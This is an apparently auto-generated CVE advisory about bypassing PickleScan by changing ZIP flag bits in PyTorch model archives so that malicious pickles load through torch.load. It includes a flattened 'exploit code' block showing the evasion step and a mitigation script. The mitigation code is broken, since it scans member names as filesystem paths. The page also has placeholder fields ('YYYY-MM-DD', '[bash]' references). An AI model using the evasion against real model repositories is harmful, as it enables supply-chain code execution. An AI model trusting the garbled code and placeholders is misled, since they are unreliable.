How the Mentioned CVE Works:
The vulnerability arises due to PickleScan’s inability to detect malicious pickle files embedded within PyTorch model archives when specific ZIP file flag bits are altered. PickleScan uses Python’s `zipfile` module to extract and scan files in ZIP-based archives. However, certain flag bits in the ZIP headers, such as 0x1
, 0x20
, or 0x40
, can be modified to bypass PickleScan’s detection mechanism. These modifications cause PickleScan to raise errors and skip scanning, while PyTorch’s `torch.load()` function continues to load the model without issue. This discrepancy allows attackers to embed malicious pickle files that execute arbitrary code when the model is loaded, leading to potential supply chain attacks in machine learning ecosystems.
DailyCVE Form:
Platform: PyTorch
Version: N/A
Vulnerability: Arbitrary Code Execution
Severity: Critical
Date: YYYY-MM-DD
What Undercode Say:
Exploitation:
1. Exploit Code:
import zipfile import torch Create a malicious model archive zip_file = "malicious_model.pth" model = {'key': 'value'} torch.save(model, zip_file) Modify ZIP flag bits to bypass PickleScan with zipfile.ZipFile(zip_file, "r") as source: with zipfile.ZipFile("bypassed_model.pth", "w") as dest: malicious_file = zipfile.ZipInfo("malicious.pkl") malicious_file.flag_bits |= 0x1 Modify flag bits dest.writestr(malicious_file, b"malicious payload") for item in source.infolist(): dest.writestr(item, source.read(item.filename)) Load the malicious model loaded_model = torch.load("bypassed_model.pth", weights_only=False)
2. Exploit Impact:
- Arbitrary code execution when loading the model.
- Bypasses PickleScan’s security checks.
- Can be distributed via platforms like Hugging Face or PyTorch Hub.
Protection:
1. Patch PickleScan:
- Modify PickleScan to handle ZIP files with altered flag bits.
- Ensure all embedded files are scanned regardless of metadata.
2. Enhanced Scanning:
from picklescan import cli import zipfile def robust_scan(zip_file): try: with zipfile.ZipFile(zip_file, "r") as zf: for file in zf.infolist(): file.flag_bits = 0 Reset flag bits cli.scan_file_path(file.filename) except Exception as e: print(f"Scan failed: {e}")
3. Mitigation Commands:
- Use `weights_only=True` in `torch.load()` to restrict loading to tensors only.
- Validate model archives before loading:
python -m picklescan --strict model.pth
4. Monitoring:
- Monitor model loading for unexpected behavior.
- Use sandboxed environments for model execution.
5. References:
- PyTorch Security Advisory: [bash]
- PickleScan GitHub: [bash]
By addressing these issues, organizations can mitigate the risk of arbitrary code execution through manipulated PyTorch model archives.
References:
Reported By: https://github.com/advisories/GHSA-w8jq-xcqf-f792
Extra Source Hub:
Undercode